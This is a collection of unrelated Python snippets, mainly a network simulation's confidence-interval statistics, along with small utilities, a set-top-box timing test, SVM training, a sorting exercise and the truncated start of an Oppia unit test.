moy_deficit_FF=moy_deficit_FF+val_deficit_FF[repetition]
moy_throughput_FF=moy_throughput_FF+val_throughput_FF[repetition]
moy_std_load_FF=moy_std_load_FF+val_std_load_FF[repetition]
moy_maximum_load_FF=moy_maximum_load_FF+val_maximum_load_FF[repetition]
moy_clients_deficit_FF=moy_clients_deficit_FF+val_clients_deficit_FF[repetition]
moy_deficit_LL=moy_deficit_LL+val_deficit_LL[repetition]
moy_throughput_LL=moy_throughput_LL+val_throughput_LL[repetition]
moy_std_load_LL=moy_std_load_LL+val_std_load_LL[repetition]
moy_maximum_load_LL=moy_maximum_load_LL+val_maximum_load_LL[repetition]
moy_clients_deficit_LL=moy_clients_deficit_LL+val_clients_deficit_LL[repetition]
for cla in range(0,priority_class):
moy_deficit_classes[cla]=moy_deficit_classes[cla]+val_deficit_classes[cla][repetition]
moy_throughput_classes[cla]=moy_throughput_classes[cla]+val_throughput_classes[cla][repetition]
moy_clients_deficit_classes[cla]=moy_clients_deficit_classes[cla]+val_clients_deficit_classes[cla][repetition]
moy_deficit_RSSI_classes[cla]=moy_deficit_RSSI_classes[cla]+val_deficit_classes_RSSI[cla][repetition]
moy_throughput_RSSI_classes[cla]=moy_throughput_RSSI_classes[cla]+val_throughput_classes_RSSI[cla][repetition]
moy_clients_deficit_RSSI_classes[cla]=moy_clients_deficit_RSSI_classes[cla]+val_clients_deficit_classes_RSSI[cla][repetition]
moy_deficit_FF_classes[cla]=moy_deficit_FF_classes[cla]+val_deficit_classes_FF[cla][repetition]
moy_throughput_FF_classes[cla]=moy_throughput_FF_classes[cla]+val_throughput_classes_FF[cla][repetition]
moy_clients_deficit_FF_classes[cla]=moy_clients_deficit_FF_classes[cla]+val_clients_deficit_classes_FF[cla][repetition]
moy_deficit_LL_classes[cla]=moy_deficit_LL_classes[cla]+val_deficit_classes_LL[cla][repetition]
moy_throughput_LL_classes[cla]=moy_throughput_LL_classes[cla]+val_throughput_classes_LL[cla][repetition]
moy_clients_deficit_LL_classes[cla]=moy_clients_deficit_LL_classes[cla]+val_clients_deficit_classes_LL[cla][repetition]
if repetition==nb_repetition-1:
moy_deficit_priority=float(moy_deficit_priority)/nb_repetition
moy_throughput_priority=float(moy_throughput_priority)/nb_repetition
moy_std_load_priority=float(moy_std_load_priority)/nb_repetition
moy_maximum_load_priority=float(moy_maximum_load_priority)/nb_repetition
moy_clients_deficit_priority=float(moy_clients_deficit_priority)/nb_repetition
moy_deficit_RSSI=float(moy_deficit_RSSI)/nb_repetition
moy_throughput_RSSI=float(moy_throughput_RSSI)/nb_repetition
moy_std_load_RSSI=float(moy_std_load_RSSI)/nb_repetition
moy_maximum_load_RSSI=float(moy_maximum_load_RSSI)/nb_repetition
moy_clients_deficit_RSSI=float(moy_clients_deficit_RSSI)/nb_repetition
moy_deficit_FF=float(moy_deficit_FF)/nb_repetition
moy_throughput_FF=float(moy_throughput_FF)/nb_repetition
moy_std_load_FF=float(moy_std_load_FF)/nb_repetition
moy_maximum_load_FF=float(moy_maximum_load_FF)/nb_repetition
moy_clients_deficit_FF=float(moy_clients_deficit_FF)/nb_repetition
moy_deficit_LL=float(moy_deficit_LL)/nb_repetition
moy_throughput_LL=float(moy_throughput_LL)/nb_repetition
moy_std_load_LL=float(moy_std_load_LL)/nb_repetition
moy_maximum_load_LL=float(moy_maximum_load_LL)/nb_repetition
moy_clients_deficit_LL=float(moy_clients_deficit_LL)/nb_repetition
for cla in range(0,priority_class):
moy_deficit_classes[cla]=float(moy_deficit_classes[cla])/nb_repetition
moy_throughput_classes[cla]=float(moy_throughput_classes[cla])/nb_repetition
moy_clients_deficit_classes[cla]=float(moy_clients_deficit_classes[cla])/nb_repetition
moy_deficit_RSSI_classes[cla]=float(moy_deficit_RSSI_classes[cla])/nb_repetition
moy_throughput_RSSI_classes[cla]=float(moy_throughput_RSSI_classes[cla])/nb_repetition
moy_clients_deficit_RSSI_classes[cla]=float(moy_clients_deficit_RSSI_classes[cla])/nb_repetition
moy_deficit_FF_classes[cla]=float(moy_deficit_FF_classes[cla])/nb_repetition
moy_throughput_FF_classes[cla]=float(moy_throughput_FF_classes[cla])/nb_repetition
moy_clients_deficit_FF_classes[cla]=float(moy_clients_deficit_FF_classes[cla])/nb_repetition
moy_deficit_LL_classes[cla]=float(moy_deficit_LL_classes[cla])/nb_repetition
moy_throughput_LL_classes[cla]=float(moy_throughput_LL_classes[cla])/nb_repetition
moy_clients_deficit_LL_classes[cla]=float(moy_clients_deficit_LL_classes[cla])/nb_repetition
SN_deficit_priority=0
SN_throughput_priority=0
SN_std_load_priority=0
SN_maximum_load_priority=0
SN_clients_deficit_priority=0
SE_deficit_priority=0
SE_throughput_priority=0
SE_std_load_priority=0
SE_maximum_load_priority=0
SE_clients_deficit_priority=0
SN_deficit_RSSI=0
SN_throughput_RSSI=0
SN_std_load_RSSI=0
SN_maximum_load_RSSI=0
SN_clients_deficit_RSSI=0
SE_deficit_RSSI=0
SE_throughput_RSSI=0
SE_std_load_RSSI=0
SE_maximum_load_RSSI=0
SE_clients_deficit_RSSI=0
SN_deficit_FF=0
SN_throughput_FF=0
SN_std_load_FF=0
SN_maximum_load_FF=0
SN_clients_deficit_FF=0
SE_deficit_FF=0
SE_throughput_FF=0
SE_std_load_FF=0
SE_maximum_load_FF=0
SE_clients_deficit_FF=0
SN_deficit_LL=0
SN_throughput_LL=0
SN_std_load_LL=0
SN_maximum_load_LL=0
SN_clients_deficit_LL=0
SE_deficit_LL=0
SE_throughput_LL=0
SE_std_load_LL=0
SE_maximum_load_LL=0
SE_clients_deficit_LL=0
SN_deficit_priority_classes={}
SN_throughput_priority_classes={}
SN_clients_deficit_priority_classes={}
SE_deficit_priority_classes={}
SE_throughput_priority_classes={}
SE_clients_deficit_priority_classes={}
SN_deficit_RSSI_classes={}
SN_throughput_RSSI_classes={}
SN_clients_deficit_RSSI_classes={}
SE_deficit_RSSI_classes={}
SE_throughput_RSSI_classes={}
SE_clients_deficit_RSSI_classes={}
SN_deficit_FF_classes={}
SN_throughput_FF_classes={}
SN_clients_deficit_FF_classes={}
SE_deficit_FF_classes={}
SE_throughput_FF_classes={}
SE_clients_deficit_FF_classes={}
SN_deficit_LL_classes={}
SN_throughput_LL_classes={}
SN_clients_deficit_LL_classes={}
SE_deficit_LL_classes={}
SE_throughput_LL_classes={}
SE_clients_deficit_LL_classes={}
for cla in range(0,priority_class):
SN_deficit_priority_classes[cla]=0
SN_throughput_priority_classes[cla]=0
SN_clients_deficit_priority_classes[cla]=0
SE_deficit_priority_classes[cla]=0
SE_throughput_priority_classes[cla]=0
SE_clients_deficit_priority_classes[cla]=0
SN_deficit_RSSI_classes[cla]=0
SN_throughput_RSSI_classes[cla]=0
SN_clients_deficit_RSSI_classes[cla]=0
SE_deficit_RSSI_classes[cla]=0
SE_throughput_RSSI_classes[cla]=0
SE_clients_deficit_RSSI_classes[cla]=0
SN_deficit_FF_classes[cla]=0
SN_throughput_FF_classes[cla]=0
SN_clients_deficit_FF_classes[cla]=0
SE_deficit_FF_classes[cla]=0
SE_throughput_FF_classes[cla]=0
SE_clients_deficit_FF_classes[cla]=0
SN_deficit_LL_classes[cla]=0
SN_throughput_LL_classes[cla]=0
SN_clients_deficit_LL_classes[cla]=0
SE_deficit_LL_classes[cla]=0
SE_throughput_LL_classes[cla]=0
SE_clients_deficit_LL_classes[cla]=0
for i in range (0,nb_repetition):
SN_deficit_priority=SN_deficit_priority+(val_deficit_priority[i]-moy_deficit_priority)**2
SN_throughput_priority=SN_throughput_priority+(val_throughput_priority[i]-moy_throughput_priority)**2
SN_std_load_priority=SN_std_load_priority+(val_std_load_priority[i]-moy_std_load_priority)**2
SN_maximum_load_priority=SN_maximum_load_priority+(val_maximum_load_priority[i]-moy_maximum_load_priority)**2
SN_clients_deficit_priority=SN_clients_deficit_priority+(val_clients_deficit_priority[i]-moy_clients_deficit_priority)**2
SN_deficit_RSSI=SN_deficit_RSSI+(val_deficit_RSSI[i]-moy_deficit_RSSI)**2
SN_throughput_RSSI=SN_throughput_RSSI+(val_throughput_RSSI[i]-moy_throughput_RSSI)**2
SN_std_load_RSSI=SN_std_load_RSSI+(val_std_load_RSSI[i]-moy_std_load_RSSI)**2
SN_maximum_load_RSSI=SN_maximum_load_RSSI+(val_maximum_load_RSSI[i]-moy_maximum_load_RSSI)**2
SN_clients_deficit_RSSI=SN_clients_deficit_RSSI+(val_clients_deficit_RSSI[i]-moy_clients_deficit_RSSI)**2
SN_deficit_FF=SN_deficit_FF+(val_deficit_FF[i]-moy_deficit_FF)**2
SN_throughput_FF=SN_throughput_FF+(val_throughput_FF[i]-moy_throughput_FF)**2
SN_std_load_FF=SN_std_load_FF+(val_std_load_FF[i]-moy_std_load_FF)**2
SN_maximum_load_FF=SN_maximum_load_FF+(val_maximum_load_FF[i]-moy_maximum_load_FF)**2
SN_clients_deficit_FF=SN_clients_deficit_FF+(val_clients_deficit_FF[i]-moy_clients_deficit_FF)**2
SN_deficit_LL=SN_deficit_LL+(val_deficit_LL[i]-moy_deficit_LL)**2
SN_throughput_LL=SN_throughput_LL+(val_throughput_LL[i]-moy_throughput_LL)**2
SN_std_load_LL=SN_std_load_LL+(val_std_load_LL[i]-moy_std_load_LL)**2
SN_maximum_load_LL=SN_maximum_load_LL+(val_maximum_load_LL[i]-moy_maximum_load_LL)**2
SN_clients_deficit_LL=SN_clients_deficit_LL+(val_clients_deficit_LL[i]-moy_clients_deficit_LL)**2
for cla in range(0,priority_class):
SN_deficit_priority_classes[cla]=SN_deficit_priority_classes[cla]+(val_deficit_classes[cla][i]-moy_deficit_classes[cla])**2
SN_throughput_priority_classes[cla]=SN_throughput_priority_classes[cla]+(val_throughput_classes[cla][i]-moy_throughput_classes[cla])**2
SN_clients_deficit_priority_classes[cla]=SN_clients_deficit_priority_classes[cla]+ (val_clients_deficit_classes[cla][i]-moy_clients_deficit_classes[cla])**2
SN_deficit_RSSI_classes[cla]=SN_deficit_RSSI_classes[cla]+(val_deficit_classes_RSSI[cla][i]-moy_deficit_RSSI_classes[cla])**2
SN_throughput_RSSI_classes[cla]=SN_throughput_RSSI_classes[cla]+(val_throughput_classes_RSSI[cla][i]-moy_throughput_RSSI_classes[cla])**2
SN_clients_deficit_RSSI_classes[cla]=SN_clients_deficit_RSSI_classes[cla]+(val_clients_deficit_classes_RSSI[cla][i]-moy_clients_deficit_RSSI_classes[cla])**2
SN_deficit_FF_classes[cla]=SN_deficit_FF_classes[cla]+(val_deficit_classes_FF[cla][i]-moy_deficit_FF_classes[cla])**2
SN_throughput_FF_classes[cla]=SN_throughput_FF_classes[cla]+(val_throughput_classes_FF[cla][i]-moy_throughput_FF_classes[cla])**2
SN_clients_deficit_FF_classes[cla]=SN_clients_deficit_FF_classes[cla]+(val_clients_deficit_classes_FF[cla][i]-moy_clients_deficit_FF_classes[cla])**2
SN_deficit_LL_classes[cla]=SN_deficit_LL_classes[cla]+(val_deficit_classes_LL[cla][i]-moy_deficit_LL_classes[cla])**2
SN_throughput_LL_classes[cla]=SN_throughput_LL_classes[cla]+(val_throughput_classes_LL[cla][i]-moy_throughput_LL_classes[cla])**2
SN_clients_deficit_LL_classes[cla]=SN_clients_deficit_LL_classes[cla]+(val_clients_deficit_classes_LL[cla][i]-moy_clients_deficit_LL_classes[cla])**2
SN_deficit_priority=math.sqrt(SN_deficit_priority/nb_repetition)
SN_throughput_priority=math.sqrt(SN_throughput_priority/nb_repetition)
SN_std_load_priority=math.sqrt(SN_std_load_priority/nb_repetition)
SN_maximum_load_priority=math.sqrt(SN_maximum_load_priority/nb_repetition)
SN_clients_deficit_priority=math.sqrt(SN_clients_deficit_priority/nb_repetition)
SE_deficit_priority=SN_deficit_priority/math.sqrt(nb_repetition)
SE_throughput_priority=SN_throughput_priority/math.sqrt(nb_repetition)
SE_std_load_priority=SN_std_load_priority/math.sqrt(nb_repetition)
SE_maximum_load_priority=SN_maximum_load_priority/math.sqrt(nb_repetition)
SE_clients_deficit_priority=SN_clients_deficit_priority/math.sqrt(nb_repetition)
SN_deficit_RSSI=math.sqrt(SN_deficit_RSSI/nb_repetition)
SN_throughput_RSSI=math.sqrt(SN_throughput_RSSI/nb_repetition)
SN_std_load_RSSI=math.sqrt(SN_std_load_RSSI/nb_repetition)
SN_maximum_load_RSSI=math.sqrt(SN_maximum_load_RSSI/nb_repetition)
SN_clients_deficit_RSSI=math.sqrt(SN_clients_deficit_RSSI/nb_repetition)
SE_deficit_RSSI=SN_deficit_RSSI/math.sqrt(nb_repetition)
SE_throughput_RSSI=SN_throughput_RSSI/math.sqrt(nb_repetition)
SE_std_load_RSSI=SN_std_load_RSSI/math.sqrt(nb_repetition)
SE_maximum_load_RSSI=SN_maximum_load_RSSI/math.sqrt(nb_repetition)
SE_clients_deficit_RSSI=SN_clients_deficit_RSSI/math.sqrt(nb_repetition)
SN_deficit_FF=math.sqrt(SN_deficit_FF/nb_repetition)
SN_throughput_FF=math.sqrt(SN_throughput_FF/nb_repetition)
SN_std_load_FF=math.sqrt(SN_std_load_FF/nb_repetition)
SN_maximum_load_FF=math.sqrt(SN_maximum_load_FF/nb_repetition)
SN_clients_deficit_FF=math.sqrt(SN_clients_deficit_FF/nb_repetition)
SE_deficit_FF=SN_deficit_FF/math.sqrt(nb_repetition)
SE_throughput_FF=SN_throughput_FF/math.sqrt(nb_repetition)
SE_std_load_FF=SN_std_load_FF/math.sqrt(nb_repetition)
SE_maximum_load_FF=SN_maximum_load_FF/math.sqrt(nb_repetition)
SE_clients_deficit_FF=SN_clients_deficit_FF/math.sqrt(nb_repetition)
SN_deficit_LL=math.sqrt(SN_deficit_LL/nb_repetition)
SN_throughput_LL=math.sqrt(SN_throughput_LL/nb_repetition)
SN_std_load_LL=math.sqrt(SN_std_load_LL/nb_repetition)
SN_maximum_load_LL=math.sqrt(SN_maximum_load_LL/nb_repetition)
SN_clients_deficit_LL=math.sqrt(SN_clients_deficit_LL/nb_repetition)
SE_deficit_LL=SN_deficit_LL/math.sqrt(nb_repetition)
SE_throughput_LL=SN_throughput_LL/math.sqrt(nb_repetition)
SE_std_load_LL=SN_std_load_LL/math.sqrt(nb_repetition)
SE_maximum_load_LL=SN_maximum_load_LL/math.sqrt(nb_repetition)
SE_clients_deficit_LL=SN_clients_deficit_LL/math.sqrt(nb_repetition)
SE_deficit_priority_classes={}
SE_throughput_priority_classes={}
SE_clients_deficit_priority_classes={}
SE_deficit_RSSI_classes={}
SE_throughput_RSSI_classes={}
SE_clients_deficit_RSSI_classes={}
SE_deficit_FF_classes={}
SE_throughput_FF_classes={}
SE_clients_deficit_FF_classes={}
SE_deficit_LL_classes={}
SE_throughput_LL_classes={}
SE_clients_deficit_LL_classes={}
for cla in range(0,priority_class):
SN_deficit_priority_classes[cla]=math.sqrt(SN_deficit_priority_classes[cla]/nb_repetition)
SN_throughput_priority_classes[cla]=math.sqrt(SN_throughput_priority_classes[cla]/nb_repetition)
SN_clients_deficit_priority_classes[cla]=math.sqrt(SN_clients_deficit_priority_classes[cla]/nb_repetition)
SE_deficit_priority_classes[cla]=SN_deficit_priority_classes[cla]/math.sqrt(nb_repetition)
SE_throughput_priority_classes[cla]=SN_throughput_priority_classes[cla]/math.sqrt(nb_repetition)
SE_clients_deficit_priority_classes[cla]=SN_clients_deficit_priority_classes[cla]/math.sqrt(nb_repetition)
SN_deficit_RSSI_classes[cla]=math.sqrt(SN_deficit_RSSI_classes[cla]/nb_repetition)
SN_throughput_RSSI_classes[cla]=math.sqrt(SN_throughput_RSSI_classes[cla]/nb_repetition)
SN_clients_deficit_RSSI_classes[cla]=math.sqrt(SN_clients_deficit_RSSI_classes[cla]/nb_repetition)
SE_deficit_RSSI_classes[cla]=SN_deficit_RSSI_classes[cla]/math.sqrt(nb_repetition)
SE_throughput_RSSI_classes[cla]=SN_throughput_RSSI_classes[cla]/math.sqrt(nb_repetition)
SE_clients_deficit_RSSI_classes[cla]=SN_clients_deficit_RSSI_classes[cla]/math.sqrt(nb_repetition)
SN_deficit_FF_classes[cla]=math.sqrt(SN_deficit_FF_classes[cla]/nb_repetition)
SN_throughput_FF_classes[cla]=math.sqrt(SN_throughput_FF_classes[cla]/nb_repetition)
SN_clients_deficit_FF_classes[cla]=math.sqrt(SN_clients_deficit_FF_classes[cla]/nb_repetition)
SE_deficit_FF_classes[cla]=SN_deficit_FF_classes[cla]/math.sqrt(nb_repetition)
SE_throughput_FF_classes[cla]=SN_throughput_FF_classes[cla]/math.sqrt(nb_repetition)
SE_clients_deficit_FF_classes[cla]=SN_clients_deficit_FF_classes[cla]/math.sqrt(nb_repetition)
SN_deficit_LL_classes[cla]=math.sqrt(SN_deficit_LL_classes[cla]/nb_repetition)
SN_throughput_LL_classes[cla]=math.sqrt(SN_throughput_LL_classes[cla]/nb_repetition)
SN_clients_deficit_LL_classes[cla]=math.sqrt(SN_clients_deficit_LL_classes[cla]/nb_repetition)
SE_deficit_LL_classes[cla]=SN_deficit_LL_classes[cla]/math.sqrt(nb_repetition)
SE_throughput_LL_classes[cla]=SN_throughput_LL_classes[cla]/math.sqrt(nb_repetition)
SE_clients_deficit_LL_classes[cla]=SN_clients_deficit_LL_classes[cla]/math.sqrt(nb_repetition)
###################la valeur de 1.96 correspond a un interval de confiance ce 95%####################
erreur_deficit_priority=SE_deficit_priority* 1.96
erreur_throughput_priority=SE_throughput_priority* 1.96
erreur_std_load_priority=SE_std_load_priority* 1.96
erreur_maximum_load_priority=SE_maximum_load_priority* 1.96
erreur_clients_deficit_priority=SE_maximum_load_priority* 1.96
erreur_deficit_RSSI=SE_deficit_RSSI* 1.96
erreur_throughput_RSSI=SE_throughput_RSSI* 1.96
erreur_std_load_RSSI=SE_std_load_RSSI* 1.96
erreur_maximum_load_RSSI=SE_maximum_load_RSSI* 1.96
erreur_clients_deficit_RSSI=SE_maximum_load_RSSI* 1.96
erreur_deficit_FF=SE_deficit_FF* 1.96
erreur_throughput_FF=SE_throughput_FF* 1.96
erreur_std_load_FF=SE_std_load_FF* 1.96
erreur_maximum_load_FF=SE_maximum_load_FF* 1.96
erreur_clients_deficit_FF=SE_maximum_load_FF* 1.96
erreur_deficit_LL=SE_deficit_LL* 1.96
erreur_throughput_LL=SE_throughput_LL* 1.96
erreur_std_load_LL=SE_std_load_LL* 1.96
erreur_maximum_load_LL=SE_maximum_load_LL* 1.96
erreur_clients_deficit_LL=SE_maximum_load_LL* 1.96
erreur_deficit_priority_classes={}
erreur_throughput_priority_classes={}
erreur_clients_deficit_priority_classes={}
erreur_deficit_RSSI_classes={}
erreur_throughput_RSSI_classes={}
erreur_clients_deficit_RSSI_classes={}
erreur_deficit_FF_classes={}
erreur_throughput_FF_classes={}
erreur_clients_deficit_FF_classes={}
erreur_deficit_LL_classes={}
erreur_throughput_LL_classes={}
erreur_clients_deficit_LL_classes={}
for cla in range(0,priority_class):
erreur_deficit_priority_classes[cla]=SE_deficit_priority_classes[cla]* 1.96
erreur_throughput_priority_classes[cla]=SE_throughput_priority_classes[cla]* 1.96
erreur_clients_deficit_priority_classes[cla]=SE_clients_deficit_priority_classes[cla]* 1.96
erreur_deficit_RSSI_classes[cla]=SE_deficit_RSSI_classes[cla]* 1.96
erreur_throughput_RSSI_classes[cla]=SE_throughput_RSSI_classes[cla]* 1.96
erreur_clients_deficit_RSSI_classes[cla]=SE_clients_deficit_RSSI_classes[cla]* 1.96
erreur_deficit_FF_classes[cla]=SE_deficit_FF_classes[cla]* 1.96
erreur_throughput_FF_classes[cla]=SE_throughput_FF_classes[cla]* 1.96
erreur_clients_deficit_FF_classes[cla]=SE_clients_deficit_FF_classes[cla]* 1.96
erreur_deficit_LL_classes[cla]=SE_deficit_LL_classes[cla]* 1.96
erreur_throughput_LL_classes[cla]=SE_throughput_LL_classes[cla]* 1.96
erreur_clients_deficit_LL_classes[cla]=SE_clients_deficit_LL_classes[cla]* 1.96
s_deficit_priority=str(5*density_nodes)+" "+str(moy_deficit_priority)+" "+str(erreur_deficit_priority)+" "+str(moy_deficit_RSSI)+" "+str(erreur_deficit_RSSI)+" "+str(moy_deficit_FF)+" "+str(erreur_deficit_FF)+" "+str(moy_deficit_LL)+" "+str(erreur_deficit_LL)+"\n"
s_throughput_priority=str(5*density_nodes)+" "+str(moy_throughput_priority)+" "+str(erreur_throughput_priority)+" "+str(moy_throughput_RSSI)+" "+str(erreur_throughput_RSSI)+" "+str(moy_throughput_FF)+" "+str(erreur_throughput_FF)+" "+str(moy_throughput_LL)+" "+str(erreur_throughput_LL)+"\n"
s_std_load_priority=str(5*density_nodes)+" "+str(moy_std_load_priority)+" "+str(erreur_std_load_priority)+" "+str(moy_std_load_RSSI)+" "+str(erreur_std_load_RSSI)+" "+str(moy_std_load_FF)+" "+str(erreur_std_load_FF)+" "+str(moy_std_load_LL)+" "+str(erreur_std_load_LL)+"\n"
s_maximum_load_priority=str(5*density_nodes)+" "+str(moy_maximum_load_priority)+" "+str(erreur_maximum_load_priority)+" "+str(moy_maximum_load_RSSI)+" "+str(erreur_maximum_load_RSSI)+" "+str(moy_maximum_load_FF)+" "+str(erreur_maximum_load_FF)+" "+str(moy_maximum_load_LL)+" "+str(erreur_maximum_load_LL)+"\n"
s_clients_deficit_priority=str(5*density_nodes)+" "+str(moy_clients_deficit_priority)+" "+str(erreur_clients_deficit_priority)+" "+str(moy_clients_deficit_RSSI)+" "+str(erreur_clients_deficit_RSSI)+" "+str(moy_clients_deficit_FF)+" "+str(erreur_clients_deficit_FF)+" "+str(moy_clients_deficit_LL)+" "+str(erreur_clients_deficit_LL)+"\n"
s_deficit_classes=str(5*density_nodes)
s_throughput_classes=str(5*density_nodes)
s_nb_clients_deficit_classes=str(5*density_nodes)
for cla in range(0,priority_class):
s_deficit_classes=s_deficit_classes+" "+str(round(moy_deficit_classes[cla],5))+" "+str(round(erreur_deficit_classes[cla],5))+" "+str(round(moy_deficit_RSSI_classes[cla],5))+" "+str(round(erreur_deficit_RSSI_classes[cla],5))+" "+str(round(moy_deficit_FF_classes[cla],5))+" "+str(round(erreur_deficit_FF_classes[cla],5))+" "+str(round(moy_deficit_LL_classes[cla],5))+" "+str(round(erreur_deficit_LL_classes[cla],5))
s_throughput_classes=s_throughput_classes+" "+str(round(moy_throughput_classes[cla],5))+" "+str(round(erreur_throughput_classes[cla],5))+" "+str(round(moy_throughput_RSSI_classes[cla],5))+" "+str(round(erreur_throughput_RSSI_classes[cla],5))+" "+str(round(moy_throughput_FF_classes[cla],5))+" "+str(round(erreur_throughput_FF_classes[cla],5))+" "+str(round(moy_throughput_LL_classes[cla],5))+" "+str(round(erreur_throughput_LL_classes[cla],5))
s_nb_clients_deficit_classes=s_nb_clients_deficit_classes+" "+str(round(moy_clients_deficit_classes[cla],5))+" "+str(round(erreur_clients_deficit_classes[cla],5))+" "+str(round(moy_clients_deficit_RSSI_classes[cla],5))+" "+str(round(erreur_clients_deficit_RSSI_classes[cla],5))+" "+str(round(moy_clients_deficit_FF_classes[cla],5))+" "+str(round(erreur_clients_deficit_FF_classes[cla],5))+" "+str(round(moy_clients_deficit_LL_classes[cla],5))+" "+str(round(erreur_clients_deficit_LL_classes[cla],5))
s_deficit_classes=s_deficit_classes+"\n"
s_throughput_classes=s_throughput_classes+"\n"
s_nb_clients_deficit_classes=s_nb_clients_deficit_classes+"\n"
g_deficit.write(s_deficit_priority)
g_throughput.write(s_throughput_priority)
g_APs_std_load.write(s_std_load_priority)
g_APs_maximum_load.write(s_maximum_load_priority)
g_clients_Nb_deficit.write(s_clients_deficit_priority)
g_PLOT_deficit_classes.write(s_deficit_classes)
g_throughput_classes.write(s_throughput_classes)
g_clients_Nb_deficit_class.write(s_nb_clients_deficit_classes)
moy_deficit_priority=0
moy_throughput_priority=0
moy_std_load_priority=0
moy_maximum_load_priority=0
moy_clients_deficit_priority=0
erreur_deficit_priority=0
erreur_throughput_priority=0
erreur_std_load_priority=0
erreur_maximum_load_priority=0
erreur_clients_deficit_priority=0
moy_deficit_RSSI=0
moy_throughput_RSSI=0
moy_std_load_RSSI=0
moy_maximum_load_RSSI=0
moy_clients_deficit_RSSI=0
erreur_deficit_RSSI=0
erreur_throughput_RSSI=0
erreur_std_load_RSSI=0
erreur_maximum_load_RSSI=0
erreur_clients_deficit_RSSI=0
moy_deficit_FF=0
moy_throughput_FF=0
moy_std_load_FF=0
moy_maximum_load_FF=0
moy_clients_deficit_FF=0
erreur_deficit_FF=0
erreur_throughput_FF=0
erreur_std_load_FF=0
erreur_maximum_load_FF=0
erreur_clients_deficit_FF=0
moy_deficit_LL=0
moy_throughput_LL=0
moy_std_load_LL=0
moy_maximum_load_LL=0
moy_clients_deficit_LL=0
erreur_deficit_LL=0
erreur_throughput_LL=0
erreur_std_load_LL=0
erreur_maximum_load_LL=0
erreur_clients_deficit_LL=0
for cla in range(0,priority_class):
moy_deficit_classes[cla]=0
moy_throughput_classes[cla]=0
moy_clients_deficit_classes[cla]=0
erreur_deficit_classes[cla]=0
erreur_throughput_classes[cla]=0
erreur_clients_deficit_classes[cla]=0
moy_deficit_RSSI_classes[cla]=0
moy_throughput_RSSI_classes[cla]=0
moy_clients_deficit_RSSI_classes[cla]=0
erreur_deficit_RSSI_classes[cla]=0
erreur_throughput_RSSI_classes[cla]=0
erreur_clients_deficit_RSSI_classes[cla]=0
moy_deficit_FF_classes[cla]=0
moy_throughput_FF_classes[cla]=0
moy_clients_deficit_FF_classes[cla]=0
erreur_deficit_FF_classes[cla]=0
erreur_throughput_FF_classes[cla]=0
erreur_clients_deficit_FF_classes[cla]=0
moy_deficit_LL_classes[cla]=0
moy_throughput_LL_classes[cla]=0
moy_clients_deficit_LL_classes[cla]=0
erreur_deficit_LL_classes[cla]=0
erreur_throughput_LL_classes[cla]=0
erreur_clients_deficit_LL_classes[cla]=0
g_deficit.close()
g_throughput.close()
g_APs_std_load.close()
g_APs_maximum_load.close()
g_clients_Nb_deficit.close()
g_clients_Nb_deficit_class.close()
g_throughput_classes.close()
g_PLOT_deficit_classes.close()
|
import os
class Console():
def write_title(self,title):
self.write_header(title,1)
def write_header(self,msg,level=1):
output=msg
if level==1:
output= "*" * 50 + "\n" + "*" * 50 + "\n" + " " + msg + "\n" + "*" * 50 + "\n" + "*" * 50 + "\n"
if level==2:
output= "*" * 50 + "\n" + " " + msg + "\n" + "*" * 50 + "\n"
if level==3:
output = msg + "\n" + "-" * len(msg)
print(output)
def write_footer(self, msg):
return msg
def get_bold(self,msg):
return msg
def get_italic(self,msg):
return msg
def get_underlined(self,msg):
return msg
def get_hyperlink(self,link,text):
return text + "("+link+")"
def write_separator(self):
print("-" * 50)
def write_line(self,msg):
print(msg)
def completed(self):
pass
def start(self):
pass
|
import pwd
import grp
larsx = pwd.getpwnam('larsx')
print larsx
print """
Name: {}
UID: {}
Home: {}
Shell: {}
""".format(larsx.pw_name, larsx.pw_uid, larsx.pw_dir, larsx.pw_shell)
group = grp.getgrgid(larsx.pw_gid)
print """
Group: {}
GID: {}
""".format(group.gr_name, group.gr_gid)
|
# -*- coding: utf-8 -*-
"""
Title:
Description:
Author: haithem ben abdelaziz
Date:
Version:
Environment:
"""
import sc_stbt
import time
import stbt
def step1():
"""
steps: 1-go to home
2-open library menu
3-open movies menu
4-searching a free video
5-open the detail page of the free content
:return:
"""
sc_stbt.back_to_home()
sc_stbt.open_library()
sc_stbt.goto_movies_menu()
sc_stbt.select_free_video()
sc_stbt.open_movie_detail_page()
def step2():
"""
start a movie and calculate time from clicking ok to the first UI of the playback
then back to the detail page of the content
:return:
"""
sc_stbt.start_movie()
sc_stbt.detect_movie()
sc_stbt.open_movie_detail_page(press="KEY_BACK")
def main_test():
"""
1-do step1
2-do step2
3-quit the application and reopen it
4-repeat step 1
5-repeat step2 9 times (9 calcule of the specifique perf)
:return:
"""
sc_stbt.repeat(lambda :step1(),occurence=1)
sc_stbt.repeat(lambda :step2(),occurence=200)
sc_stbt.repeat(lambda :main_test(),occurence=1)
|
import os
from svmutil import svm_read_problem, svm_train, svm_save_model
cdir = os.path.abspath('.') + "/"
def train_svm_model():
y, x = svm_read_problem(cdir + 'train_pix_feature_xy.txt')
model = svm_train(y, x)
print type(model)
svm_save_model(cdir + 'model', model)
if __name__ == "__main__":
train_svm_model() |
# Import itemgetter from the operator module
# Now create a variable named sorted_fruit that used sorted() and itemgetter() to sort fruit_list by the second item in each tuple
from operator import itemgetter
fruit_list = [
('apple', 2),
('banana', 5),
('coconut', 1),
('durian', 3),
('elderberries', 4)
]
sorted_fruit = sorted(fruit_list, key=itemgetter(1))
print(sorted_fruit) |
# coding: utf-8
#
# Copyright 2022 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for methods defined in learner group fetchers."""
from __future__ import annotations
from core.domain import learner_group_fetchers
from core.domain import learner_group_services
from core.tests import test_utils
class LearnerGroupFetchersUnitTests(test_utils.GenericTestBase):
"""Tests for skill fetchers."""
FACILITATOR_ID = 'facilitator_user_1'
LEARNER_ID_1 = 'learner_user_1'
LEARNER_ID_2 = 'learner_user_2'
def setUp(self) -> None:
super().setUp()
self.LEARNER_GROUP_ID = (
learner_group_fetchers.get_new_learner_group_id()
)
self.learner_group = learner_group_services.create_learner_group(
self.LEARNER_GROUP_ID, 'Learner Group Name', 'Description',
[self.FACILITATOR_ID], [self.LEARNER_ID_1, self.LEARNER_ID_2],
